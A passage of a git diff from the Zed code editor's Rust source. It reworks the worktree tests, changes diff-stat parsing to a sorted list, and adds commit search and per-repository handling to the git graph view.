assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); // Windows-style line endings should be handled let input = "worktree /home/user/project\r\nHEAD abc123\r\nbranch refs/heads/main\r\n\r\n"; @@ -3912,89 +4023,80 @@ mod tests { assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123"); - assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); } - const TEST_WORKTREE_DIRECTORIES: &[&str] = - &["../worktrees", ".git/zed-worktrees", "my-worktrees/"]; - #[gpui::test] async fn test_create_and_list_worktrees(cx: &mut TestAppContext) { disable_git_global_config(); cx.executor().allow_parking(); - for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES { - let repo_dir = tempfile::tempdir().unwrap(); - git2::Repository::init(repo_dir.path()).unwrap(); + let temp_dir = tempfile::tempdir().unwrap(); + let repo_dir = temp_dir.path().join("repo"); + let worktrees_dir = temp_dir.path().join("worktrees"); - let repo = RealGitRepository::new( - &repo_dir.path().join(".git"), - None, - Some("git".into()), - cx.executor(), - ) - .unwrap(); + fs::create_dir_all(&repo_dir).unwrap(); + fs::create_dir_all(&worktrees_dir).unwrap(); - // Create an initial commit (required for worktrees) - smol::fs::write(repo_dir.path().join("file.txt"), "content") - .await - .unwrap(); - repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) - .await - .unwrap(); - repo.commit( - "Initial commit".into(), - None, - CommitOptions::default(), - AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), - Arc::new(checkpoint_author_envs()), - ) - .await - .unwrap(); + git2::Repository::init(&repo_dir).unwrap(); - // List worktrees — should have just the main one - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert_eq!( - worktrees[0].path.canonicalize().unwrap(), - repo_dir.path().canonicalize().unwrap() - ); + let repo = RealGitRepository::new( + &repo_dir.join(".git"), + None, + Some("git".into()), + cx.executor(), + ) + .unwrap(); - // Create a new worktree - repo.create_worktree( - "test-branch".to_string(), - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting), - Some("HEAD".to_string()), - ) + // Create an initial commit (required for worktrees) + smol::fs::write(repo_dir.join("file.txt"), "content") .await .unwrap(); + repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) + .await + .unwrap(); + repo.commit( + "Initial commit".into(), + None, + CommitOptions::default(), + AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), + Arc::new(checkpoint_author_envs()), + ) + .await + .unwrap(); - // List worktrees — should have two - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 2); - - let expected_path = - worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "test-branch"); - let new_worktree = worktrees - .iter() - .find(|w| w.branch() == "test-branch") - .expect("should find worktree with test-branch"); - assert_eq!( - new_worktree.path.canonicalize().unwrap(), - expected_path.canonicalize().unwrap(), - "failed for worktree_directory setting: {worktree_dir_setting:?}" - ); + // List worktrees — should have just the main one + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert_eq!( + worktrees[0].path.canonicalize().unwrap(), + repo_dir.canonicalize().unwrap() + ); - // Clean up so the next iteration starts fresh - repo.remove_worktree(expected_path, true).await.unwrap(); + let worktree_path = worktrees_dir.join("some-worktree"); - // Clean up the worktree base directory if it was created outside repo_dir - // (e.g. for the "../worktrees" setting, it won't be inside the TempDir) - let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting); - if !resolved_dir.starts_with(repo_dir.path()) { - let _ = std::fs::remove_dir_all(&resolved_dir); - } - } + // Create a new worktree + repo.create_worktree( + Some("test-branch".to_string()), + worktree_path.clone(), + Some("HEAD".to_string()), + ) + .await + .unwrap(); + + // List worktrees — should have two + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 2); + + let new_worktree = worktrees + .iter() + .find(|w| w.display_name() == "test-branch") + .expect("should find worktree with test-branch"); + assert_eq!( + new_worktree.path.canonicalize().unwrap(), + worktree_path.canonicalize().unwrap(), + ); } #[gpui::test] @@ -4002,147 +4104,92 @@ mod tests { disable_git_global_config(); cx.executor().allow_parking(); - for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES { - let repo_dir = tempfile::tempdir().unwrap(); - git2::Repository::init(repo_dir.path()).unwrap(); + let temp_dir = tempfile::tempdir().unwrap(); + let repo_dir = temp_dir.path().join("repo"); + let worktrees_dir = temp_dir.path().join("worktrees"); + git2::Repository::init(&repo_dir).unwrap(); - let repo = RealGitRepository::new( - &repo_dir.path().join(".git"), - None, - Some("git".into()), - cx.executor(), - ) - .unwrap(); + let repo = RealGitRepository::new( + &repo_dir.join(".git"), + None, + Some("git".into()), + cx.executor(), + ) + .unwrap(); - // Create an initial commit - smol::fs::write(repo_dir.path().join("file.txt"), "content") - .await - .unwrap(); - repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) - .await - .unwrap(); - repo.commit( - "Initial commit".into(), - None, - CommitOptions::default(), - AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), - Arc::new(checkpoint_author_envs()), - ) + // Create an initial commit + smol::fs::write(repo_dir.join("file.txt"), "content") .await .unwrap(); - - // Create a worktree - repo.create_worktree( - "to-remove".to_string(), - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting), - Some("HEAD".to_string()), - ) + repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) .await .unwrap(); + repo.commit( + "Initial commit".into(), + None, + CommitOptions::default(), + AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), + Arc::new(checkpoint_author_envs()), + ) + .await + .unwrap(); - let worktree_path = - worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "to-remove"); - assert!(worktree_path.exists()); - - // Remove the worktree - repo.remove_worktree(worktree_path.clone(), false) - .await - .unwrap(); - - // Verify it's gone from the list - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert!( - worktrees.iter().all(|w| w.branch() != "to-remove"), - "removed worktree should not appear in list" - ); - - // Verify the directory is removed - assert!(!worktree_path.exists()); - - // Clean up the worktree base directory if it was created outside repo_dir - // (e.g. for the "../worktrees" setting, it won't be inside the TempDir) - let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting); - if !resolved_dir.starts_with(repo_dir.path()) { - let _ = std::fs::remove_dir_all(&resolved_dir); - } - } - } + // Create a worktree + let worktree_path = worktrees_dir.join("worktree-to-remove"); + repo.create_worktree( + Some("to-remove".to_string()), + worktree_path.clone(), + Some("HEAD".to_string()), + ) + .await + .unwrap(); - #[gpui::test] - async fn test_remove_worktree_force(cx: &mut TestAppContext) { - disable_git_global_config(); - cx.executor().allow_parking(); + // Remove the worktree + repo.remove_worktree(worktree_path.clone(), false) + .await + .unwrap(); - for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES { - let repo_dir = tempfile::tempdir().unwrap(); - git2::Repository::init(repo_dir.path()).unwrap(); + // Verify the directory is removed + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert!( + worktrees.iter().all(|w| w.display_name() != "to-remove"), + "removed worktree should not appear in list" + ); + assert!(!worktree_path.exists()); + + // Create a worktree + let worktree_path = worktrees_dir.join("dirty-wt"); + repo.create_worktree( + Some("dirty-wt".to_string()), + worktree_path.clone(), + Some("HEAD".to_string()), + ) + .await + .unwrap(); - let repo = RealGitRepository::new( - &repo_dir.path().join(".git"), - None, - Some("git".into()), - cx.executor(), - ) - .unwrap(); + assert!(worktree_path.exists()); - // Create an initial commit - smol::fs::write(repo_dir.path().join("file.txt"), "content") - .await - .unwrap(); - repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) - .await - .unwrap(); - repo.commit( - "Initial commit".into(), - None, - CommitOptions::default(), - AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), - Arc::new(checkpoint_author_envs()), - ) + // Add uncommitted changes in the worktree + smol::fs::write(worktree_path.join("dirty-file.txt"), "uncommitted") .await .unwrap(); - // Create a worktree - repo.create_worktree( - "dirty-wt".to_string(), - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting), - Some("HEAD".to_string()), - ) + // Non-force removal should fail with dirty worktree + let result = repo.remove_worktree(worktree_path.clone(), false).await; + assert!( + result.is_err(), + "non-force removal of dirty worktree should fail" + ); + + // Force removal should succeed + repo.remove_worktree(worktree_path.clone(), true) .await .unwrap(); - let worktree_path = - worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "dirty-wt"); - - // Add uncommitted changes in the worktree - smol::fs::write(worktree_path.join("dirty-file.txt"), "uncommitted") - .await - .unwrap(); - - // Non-force removal should fail with dirty worktree - let result = repo.remove_worktree(worktree_path.clone(), false).await; - assert!( - result.is_err(), - "non-force removal of dirty worktree should fail" - ); - - // Force removal should succeed - repo.remove_worktree(worktree_path.clone(), true) - .await - .unwrap(); - - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert!(!worktree_path.exists()); - - // Clean up the worktree base directory if it was created outside repo_dir - // (e.g. for the "../worktrees" setting, it won't be inside the TempDir) - let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting); - if !resolved_dir.starts_with(repo_dir.path()) { - let _ = std::fs::remove_dir_all(&resolved_dir); - } - } + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 1); + assert!(!worktree_path.exists()); } #[gpui::test] @@ -4150,206 +4197,97 @@ mod tests { disable_git_global_config(); cx.executor().allow_parking(); - for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES { - let repo_dir = tempfile::tempdir().unwrap(); - git2::Repository::init(repo_dir.path()).unwrap(); + let temp_dir = tempfile::tempdir().unwrap(); + let repo_dir = temp_dir.path().join("repo"); + let worktrees_dir = temp_dir.path().join("worktrees"); - let repo = RealGitRepository::new( - &repo_dir.path().join(".git"), - None, - Some("git".into()), - cx.executor(), - ) - .unwrap(); + git2::Repository::init(&repo_dir).unwrap(); - // Create an initial commit - smol::fs::write(repo_dir.path().join("file.txt"), "content") - .await - .unwrap(); - repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) - .await - .unwrap(); - repo.commit( - "Initial commit".into(), - None, - CommitOptions::default(), - AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), - Arc::new(checkpoint_author_envs()), - ) + let repo = RealGitRepository::new( + &repo_dir.join(".git"), + None, + Some("git".into()), + cx.executor(), + ) + .unwrap(); + + // Create an initial commit + smol::fs::write(repo_dir.join("file.txt"), "content") .await .unwrap(); - - // Create a worktree - repo.create_worktree( - "old-name".to_string(), - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting), - Some("HEAD".to_string()), - ) + repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default())) .await .unwrap(); + repo.commit( + "Initial commit".into(), + None, + CommitOptions::default(), + AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}), + Arc::new(checkpoint_author_envs()), + ) + .await + .unwrap(); - let old_path = - worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "old-name"); - assert!(old_path.exists()); - - // Move the worktree to a new path - let new_path = - resolve_worktree_directory(repo_dir.path(), worktree_dir_setting).join("new-name"); - repo.rename_worktree(old_path.clone(), new_path.clone()) - .await - .unwrap(); - - // Verify the old path is gone and new path exists - assert!(!old_path.exists()); - assert!(new_path.exists()); - - // Verify it shows up in worktree list at the new path - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 2); - let moved_worktree = worktrees - .iter() - .find(|w| w.branch() == "old-name") - .expect("should find worktree by branch name"); - assert_eq!( - moved_worktree.path.canonicalize().unwrap(), - new_path.canonicalize().unwrap() - ); - - // Clean up so the next iteration starts fresh - repo.remove_worktree(new_path, true).await.unwrap(); - - // Clean up the worktree base directory if it was created outside repo_dir - // (e.g. for the "../worktrees" setting, it won't be inside the TempDir) - let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting); - if !resolved_dir.starts_with(repo_dir.path()) { - let _ = std::fs::remove_dir_all(&resolved_dir); - } - } - } - - #[test] - fn test_resolve_worktree_directory() { - let work_dir = Path::new("/code/my-project"); - - // Sibling directory — outside project, so repo dir name is appended - assert_eq!( - resolve_worktree_directory(work_dir, "../worktrees"), - PathBuf::from("/code/worktrees/my-project") - ); - - // Git subdir — inside project, no repo name appended - assert_eq!( - resolve_worktree_directory(work_dir, ".git/zed-worktrees"), - PathBuf::from("/code/my-project/.git/zed-worktrees") - ); - - // Simple subdir — inside project, no repo name appended - assert_eq!( - resolve_worktree_directory(work_dir, "my-worktrees"), - PathBuf::from("/code/my-project/my-worktrees") - ); - - // Trailing slash is stripped - assert_eq!( - resolve_worktree_directory(work_dir, "../worktrees/"), - PathBuf::from("/code/worktrees/my-project") - ); - assert_eq!( - resolve_worktree_directory(work_dir, "my-worktrees/"), - PathBuf::from("/code/my-project/my-worktrees") - ); + // Create a worktree + let old_path = worktrees_dir.join("old-worktree-name"); + repo.create_worktree( + Some("old-name".to_string()), + old_path.clone(), + Some("HEAD".to_string()), + ) + .await + .unwrap(); - // Multiple trailing slashes - assert_eq!( - resolve_worktree_directory(work_dir, "foo///"), - PathBuf::from("/code/my-project/foo") - ); + assert!(old_path.exists()); - // Trailing backslashes (Windows-style) - assert_eq!( - resolve_worktree_directory(work_dir, "my-worktrees\\"), - PathBuf::from("/code/my-project/my-worktrees") - ); - assert_eq!( - resolve_worktree_directory(work_dir, "foo\\/\\"), - PathBuf::from("/code/my-project/foo") - ); + // Move the worktree to a new path + let new_path = worktrees_dir.join("new-worktree-name"); + repo.rename_worktree(old_path.clone(), new_path.clone()) + .await + .unwrap(); - // Empty string resolves to the working directory itself (inside) - assert_eq!( - resolve_worktree_directory(work_dir, ""), - PathBuf::from("/code/my-project") - ); + // Verify the old path is gone and new path exists + assert!(!old_path.exists()); + assert!(new_path.exists()); - // Just ".." — outside project, repo dir name appended + // Verify it shows up in worktree list at the new path + let worktrees = repo.worktrees().await.unwrap(); + assert_eq!(worktrees.len(), 2); + let moved_worktree = worktrees + .iter() + .find(|w| w.display_name() == "old-name") + .expect("should find worktree by branch name"); assert_eq!( - resolve_worktree_directory(work_dir, ".."), - PathBuf::from("/code/my-project") + moved_worktree.path.canonicalize().unwrap(), + new_path.canonicalize().unwrap() ); } #[test] - fn test_validate_worktree_directory() { - let work_dir = Path::new("/code/my-project"); - - // Valid: sibling - assert!(validate_worktree_directory(work_dir, "../worktrees").is_ok()); - - // Valid: subdirectory - assert!(validate_worktree_directory(work_dir, ".git/zed-worktrees").is_ok()); - assert!(validate_worktree_directory(work_dir, "my-worktrees").is_ok()); - - // Invalid: just ".." would resolve back to the working directory itself - let err = validate_worktree_directory(work_dir, "..").unwrap_err(); - assert!(err.to_string().contains("must not be \"..\"")); - - // Invalid: ".." with trailing separators - let err = validate_worktree_directory(work_dir, "..\\").unwrap_err(); - assert!(err.to_string().contains("must not be \"..\"")); - let err = validate_worktree_directory(work_dir, "../").unwrap_err(); - assert!(err.to_string().contains("must not be \"..\"")); - - // Invalid: empty string would resolve to the working directory itself - let err = validate_worktree_directory(work_dir, "").unwrap_err(); - assert!(err.to_string().contains("must not be empty")); - - // Invalid: absolute path - let err = validate_worktree_directory(work_dir, "/tmp/worktrees").unwrap_err(); - assert!(err.to_string().contains("relative path")); - - // Invalid: "/" is absolute on Unix - let err = validate_worktree_directory(work_dir, "/").unwrap_err(); - assert!(err.to_string().contains("relative path")); - - // Invalid: "///" is absolute - let err = validate_worktree_directory(work_dir, "///").unwrap_err(); - assert!(err.to_string().contains("relative path")); - - // Invalid: escapes too far up - let err = validate_worktree_directory(work_dir, "../../other-project/wt").unwrap_err(); - assert!(err.to_string().contains("outside")); - } - - #[test] - fn test_worktree_path_for_branch() { - let work_dir = Path::new("/code/my-project"); + fn test_original_repo_path_from_common_dir() { + // Normal repo: common_dir is /.git + assert_eq!( + original_repo_path_from_common_dir(Path::new("/code/zed5/.git")), + PathBuf::from("/code/zed5") + ); - // Outside project — repo dir name is part of the resolved directory + // Worktree: common_dir is the main repo's .git + // (same result — that's the point, it always traces back to the original) assert_eq!( - worktree_path_for_branch(work_dir, "../worktrees", "feature/foo"), - PathBuf::from("/code/worktrees/my-project/feature/foo") + original_repo_path_from_common_dir(Path::new("/code/zed5/.git")), + PathBuf::from("/code/zed5") ); - // Inside project — no repo dir name inserted + // Bare repo: no .git suffix, returns as-is assert_eq!( - worktree_path_for_branch(work_dir, ".git/zed-worktrees", "my-branch"), - PathBuf::from("/code/my-project/.git/zed-worktrees/my-branch") + original_repo_path_from_common_dir(Path::new("/code/zed5.git")), + PathBuf::from("/code/zed5.git") ); - // Trailing slash on setting (inside project) + // Root-level .git directory assert_eq!( - worktree_path_for_branch(work_dir, "my-worktrees/", "branch"), - PathBuf::from("/code/my-project/my-worktrees/branch") + original_repo_path_from_common_dir(Path::new("/.git")), + PathBuf::from("/") ); } @@ -4357,13 +4295,20 @@ mod tests { /// Force a Git garbage collection on the repository. fn gc(&self) -> BoxFuture<'_, Result<()>> { let working_directory = self.working_directory(); + let git_directory = self.path(); let git_binary_path = self.any_git_binary_path.clone(); let executor = self.executor.clone(); self.executor .spawn(async move { let git_binary_path = git_binary_path.clone(); let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = GitBinary::new( + git_binary_path, + working_directory, + git_directory, + executor, + true, + ); git.run(&["gc", "--prune"]).await?; Ok(()) }) diff --git a/crates/git/src/status.rs b/crates/git/src/status.rs index b20919e7ecf4748d0035a003ed5eadebae752dd7..e8b5caec505f7bf65cb4f5cd7d789207ccd8784f 100644 --- a/crates/git/src/status.rs +++ b/crates/git/src/status.rs @@ -586,13 +586,18 @@ pub struct DiffStat { pub deleted: u32, } +#[derive(Clone, Debug)] +pub struct GitDiffStat { + pub entries: Arc<[(RepoPath, DiffStat)]>, +} + /// Parses the output of `git diff --numstat` where output looks like: /// /// ```text /// 24 12 dir/file.txt /// ``` -pub fn parse_numstat(output: &str) -> HashMap { - let mut stats = HashMap::default(); +pub fn parse_numstat(output: &str) -> GitDiffStat { + let mut entries = Vec::new(); for line in output.lines() { let line = line.trim(); if line.is_empty() { @@ -613,10 +618,14 @@ pub fn parse_numstat(output: &str) -> HashMap { let Ok(path) = RepoPath::new(path_str) else { continue; }; - let stat = DiffStat { added, deleted }; - stats.insert(path, stat); + entries.push((path, DiffStat { added, deleted })); + } + entries.sort_by(|(a, _), (b, _)| a.cmp(b)); + entries.dedup_by(|(a, _), (b, _)| a == b); + + GitDiffStat { + entries: entries.into(), } - stats } #[cfg(test)] @@ -629,20 +638,25 @@ mod tests { use super::{DiffStat, parse_numstat}; + fn lookup<'a>(entries: &'a [(RepoPath, DiffStat)], path: &str) -> Option<&'a DiffStat> { + let path = RepoPath::new(path).unwrap(); + entries.iter().find(|(p, _)| p == &path).map(|(_, s)| s) + } + #[test] fn test_parse_numstat_normal() { let input = "10\t5\tsrc/main.rs\n3\t1\tREADME.md\n"; let result = parse_numstat(input); - assert_eq!(result.len(), 2); + assert_eq!(result.entries.len(), 2); assert_eq!( - result.get(&RepoPath::new("src/main.rs").unwrap()), + lookup(&result.entries, "src/main.rs"), Some(&DiffStat { added: 10, deleted: 5 }) ); assert_eq!( - result.get(&RepoPath::new("README.md").unwrap()), + lookup(&result.entries, "README.md"), Some(&DiffStat { added: 3, deleted: 1 @@ -655,10 +669,10 @@ mod tests { // git diff --numstat outputs "-\t-\tpath" for binary files let input = "-\t-\timage.png\n5\t2\tsrc/lib.rs\n"; let result = parse_numstat(input); - assert_eq!(result.len(), 1); - assert!(!result.contains_key(&RepoPath::new("image.png").unwrap())); + assert_eq!(result.entries.len(), 1); + assert!(lookup(&result.entries, "image.png").is_none()); assert_eq!( - result.get(&RepoPath::new("src/lib.rs").unwrap()), + lookup(&result.entries, "src/lib.rs"), Some(&DiffStat { added: 5, deleted: 2 @@ -668,18 +682,18 @@ mod tests { #[test] fn test_parse_numstat_empty_input() { - assert!(parse_numstat("").is_empty()); - assert!(parse_numstat("\n\n").is_empty()); - assert!(parse_numstat(" \n \n").is_empty()); + assert!(parse_numstat("").entries.is_empty()); + assert!(parse_numstat("\n\n").entries.is_empty()); + assert!(parse_numstat(" \n \n").entries.is_empty()); } #[test] fn test_parse_numstat_malformed_lines_skipped() { let input = "not_a_number\t5\tfile.rs\n10\t5\tvalid.rs\n"; let result = parse_numstat(input); - assert_eq!(result.len(), 1); + assert_eq!(result.entries.len(), 1); assert_eq!( - result.get(&RepoPath::new("valid.rs").unwrap()), + lookup(&result.entries, "valid.rs"), Some(&DiffStat { added: 10, deleted: 5 @@ -692,9 +706,9 @@ mod tests { // Lines with fewer than 3 tab-separated fields are skipped let input = "10\t5\n7\t3\tok.rs\n"; let result = parse_numstat(input); - assert_eq!(result.len(), 1); + assert_eq!(result.entries.len(), 1); assert_eq!( - result.get(&RepoPath::new("ok.rs").unwrap()), + lookup(&result.entries, "ok.rs"), Some(&DiffStat { added: 7, deleted: 3 @@ -707,7 +721,7 @@ mod tests { let input = "0\t0\tunchanged_but_present.rs\n"; let result = parse_numstat(input); assert_eq!( - result.get(&RepoPath::new("unchanged_but_present.rs").unwrap()), + lookup(&result.entries, "unchanged_but_present.rs"), Some(&DiffStat { added: 0, deleted: 0 diff --git a/crates/git_graph/Cargo.toml b/crates/git_graph/Cargo.toml index 4be3d8149baeab9c285e6c9effa61a10b86cec27..e9e31a8361e367275c994e125ae6e04cbd652fc3 100644 --- a/crates/git_graph/Cargo.toml +++ b/crates/git_graph/Cargo.toml @@ -16,6 +16,7 @@ default = [] test-support = [ "project/test-support", "gpui/test-support", + "remote_connection/test-support", ] [dependencies] @@ -23,16 +24,18 @@ anyhow.workspace = true collections.workspace = true db.workspace = true editor.workspace = true -feature_flags.workspace = true git.workspace = true git_ui.workspace = true gpui.workspace = true language.workspace = true menu.workspace = true project.workspace = true +search.workspace = true settings.workspace = true smallvec.workspace = true +smol.workspace = true theme.workspace = true +theme_settings.workspace = true time.workspace = true ui.workspace = true workspace.workspace = true @@ -44,7 +47,7 @@ git = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } project = { workspace = true, features = ["test-support"] } rand.workspace = true -recent_projects = { workspace = true, features = ["test-support"] } +remote_connection = { workspace = true, features = ["test-support"] } serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index c7235f9112904c1ab463fd7fd7942bfa26079f0f..d2dfda592753e0259c150cab7cce142cdab0851c 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -1,49 +1,57 @@ -use collections::{BTreeMap, HashMap}; +use collections::{BTreeMap, HashMap, IndexSet}; use editor::Editor; -use feature_flags::{FeatureFlagAppExt as _, GitGraphFeatureFlag}; use git::{ BuildCommitPermalinkParams, GitHostingProviderRegistry, GitRemote, Oid, ParsedGitRemote, parse_git_remote_url, - repository::{CommitDiff, CommitFile, InitialGraphCommitData, LogOrder, LogSource, RepoPath}, + repository::{ + CommitDiff, CommitFile, InitialGraphCommitData, LogOrder, LogSource, RepoPath, + SearchCommitArgs, + }, status::{FileStatus, StatusCode, TrackedStatus}, }; use git_ui::{commit_tooltip::CommitAvatar, commit_view::CommitView, git_status_icon}; use gpui::{ AnyElement, App, Bounds, ClickEvent, ClipboardItem, Corner, DefiniteLength, DragMoveEvent, ElementId, Empty, Entity, EventEmitter, FocusHandle, Focusable, Hsla, PathBuilder, Pixels, - Point, ScrollStrategy, ScrollWheelEvent, SharedString, Subscription, Task, + Point, ScrollStrategy, ScrollWheelEvent, SharedString, Subscription, Task, TextStyleRefinement, UniformListScrollHandle, WeakEntity, Window, actions, anchored, deferred, point, prelude::*, px, uniform_list, }; use language::line_diff; -use menu::{Cancel, SelectNext, SelectPrevious}; +use menu::{Cancel, SelectFirst, SelectLast, SelectNext, SelectPrevious}; use project::{ - Project, ProjectPath, + ProjectPath, git_store::{ - CommitDataState, GitGraphEvent, GitStoreEvent, GraphDataResponse, Repository, + CommitDataState, GitGraphEvent, GitStore, GitStoreEvent, GraphDataResponse, Repository, RepositoryEvent, RepositoryId, }, }; +use search::{ + SearchOption, SearchOptions, SearchSource, SelectNextMatch, SelectPreviousMatch, + ToggleCaseSensitive, buffer_search, +}; use settings::Settings; use smallvec::{SmallVec, smallvec}; use std::{ cell::Cell, ops::Range, rc::Rc, - sync::Arc, - sync::OnceLock, + sync::{Arc, OnceLock}, time::{Duration, Instant}, }; -use theme::{AccentColors, ThemeSettings}; +use theme::AccentColors; +use theme_settings::ThemeSettings; use time::{OffsetDateTime, UtcOffset, format_description::BorrowedFormatItem}; use ui::{ - ButtonLike, Chip, CommonAnimationExt as _, ContextMenu, DiffStat, Divider, ScrollableHandle, - Table, TableColumnWidths, TableInteractionState, TableResizeBehavior, Tooltip, WithScrollbar, - prelude::*, + ButtonLike, Chip, ColumnWidthConfig, CommonAnimationExt as _, ContextMenu, DiffStat, Divider, + HeaderResizeInfo, HighlightedLabel, RedistributableColumnsState, ScrollableHandle, Table, + TableInteractionState, TableRenderContext, TableResizeBehavior, Tooltip, WithScrollbar, + bind_redistributable_columns, prelude::*, render_redistributable_columns_resize_handles, + render_table_header, table_row::TableRow, }; use workspace::{ Workspace, - item::{Item, ItemEvent, SerializableItem, TabTooltipContent}, + item::{Item, ItemEvent, TabTooltipContent}, }; const COMMIT_CIRCLE_RADIUS: Pixels = px(3.5); @@ -198,6 +206,29 @@ impl ChangedFileEntry { } } +enum QueryState { + Pending(SharedString), + Confirmed((SharedString, Task<()>)), + Empty, +} + +impl QueryState { + fn next_state(&mut self) { + match self { + Self::Confirmed((query, _)) => *self = Self::Pending(std::mem::take(query)), + _ => {} + }; + } +} + +struct SearchState { + case_sensitive: bool, + editor: Entity, + state: QueryState, + pub matches: IndexSet, + pub selected_index: Option, +} + pub struct SplitState { left_ratio: f32, visible_left_ratio: f32, @@ -247,6 +278,8 @@ actions!( [ /// Opens the commit view for the selected commit. OpenCommitView, + /// Focuses the search field. + FocusSearch, ] ); @@ -710,8 +743,7 @@ pub fn init(cx: &mut App) { .cloned(); div.when( - workspace.project().read(cx).active_repository(cx).is_some() - && cx.has_flag::(), + workspace.project().read(cx).active_repository(cx).is_some(), |div| { let workspace = workspace.weak_handle(); @@ -720,16 +752,33 @@ pub fn init(cx: &mut App) { move |_: &git_ui::git_panel::Open, window, cx| { workspace .update(cx, |workspace, cx| { - let existing = workspace.items_of_type::(cx).next(); + let Some(repo) = + workspace.project().read(cx).active_repository(cx) + else { + return; + }; + let selected_repo_id = repo.read(cx).id; + + let existing = workspace + .items_of_type::(cx) + .find(|graph| graph.read(cx).repo_id == selected_repo_id); if let Some(existing) = existing { workspace.activate_item(&existing, true, true, window, cx); return; } - let project = workspace.project().clone(); + let git_store = + workspace.project().read(cx).git_store().clone(); let workspace_handle = workspace.weak_handle(); let git_graph = cx.new(|cx| { - GitGraph::new(project, workspace_handle, None, window, cx) + GitGraph::new( + selected_repo_id, + git_store, + workspace_handle, + None, + window, + cx, + ) }); workspace.add_item_to_active_pane( Box::new(git_graph), @@ -747,26 +796,37 @@ pub fn init(cx: &mut App) { let sha = action.sha.clone(); workspace .update(cx, |workspace, cx| { - let existing = workspace.items_of_type::(cx).next(); + let Some(repo) = + workspace.project().read(cx).active_repository(cx) + else { + return; + }; + let selected_repo_id = repo.read(cx).id; + + let existing = workspace + .items_of_type::(cx) + .find(|graph| graph.read(cx).repo_id == selected_repo_id); if let Some(existing) = existing { existing.update(cx, |graph, cx| { - graph.select_commit_by_sha(&sha, cx); + graph.select_commit_by_sha(sha.as_str(), cx); }); workspace.activate_item(&existing, true, true, window, cx); return; } - let project = workspace.project().clone(); + let git_store = + workspace.project().read(cx).git_store().clone(); let workspace_handle = workspace.weak_handle(); let git_graph = cx.new(|cx| { let mut graph = GitGraph::new( - project, + selected_repo_id, + git_store, workspace_handle, None, window, cx, ); - graph.select_commit_by_sha(&sha, cx); + graph.select_commit_by_sha(sha.as_str(), cx); graph }); workspace.add_item_to_active_pane( @@ -789,7 +849,7 @@ pub fn init(cx: &mut App) { move |_: &git::FileHistory, window, cx| { workspace .update(cx, |workspace, cx| { - let project = workspace.project().clone(); + let git_store = workspace.project().read(cx).git_store().clone(); let workspace_handle = workspace.weak_handle(); let file_path = active_file.path(); let file_worktree_id = active_file.worktree_id(cx); @@ -799,23 +859,20 @@ pub fn init(cx: &mut App) { path: file_path.clone(), }; - let Some((_repo, repo_path)) = project - .read(cx) - .git_store() + let Some((repo, repo_path)) = git_store .read(cx) .repository_and_path_for_project_path(&project_path, cx) else { return; }; - // todo! pass repo id to git graph as well - // let repo_id = repo.read(cx).id; - + let repo_id = repo.read(cx).id; let log_source = LogSource::File(repo_path); let git_graph = cx.new(|cx| { GitGraph::new( - project, + repo_id, + git_store, workspace_handle, Some(log_source), window, @@ -839,8 +896,8 @@ pub fn init(cx: &mut App) { .detach(); } -fn lane_center_x(bounds: Bounds, lane: f32, horizontal_scroll_offset: Pixels) -> Pixels { - bounds.origin.x + LEFT_PADDING + lane * LANE_WIDTH + LANE_WIDTH / 2.0 - horizontal_scroll_offset +fn lane_center_x(bounds: Bounds, lane: f32) -> Pixels { + bounds.origin.x + LEFT_PADDING + lane * LANE_WIDTH + LANE_WIDTH / 2.0 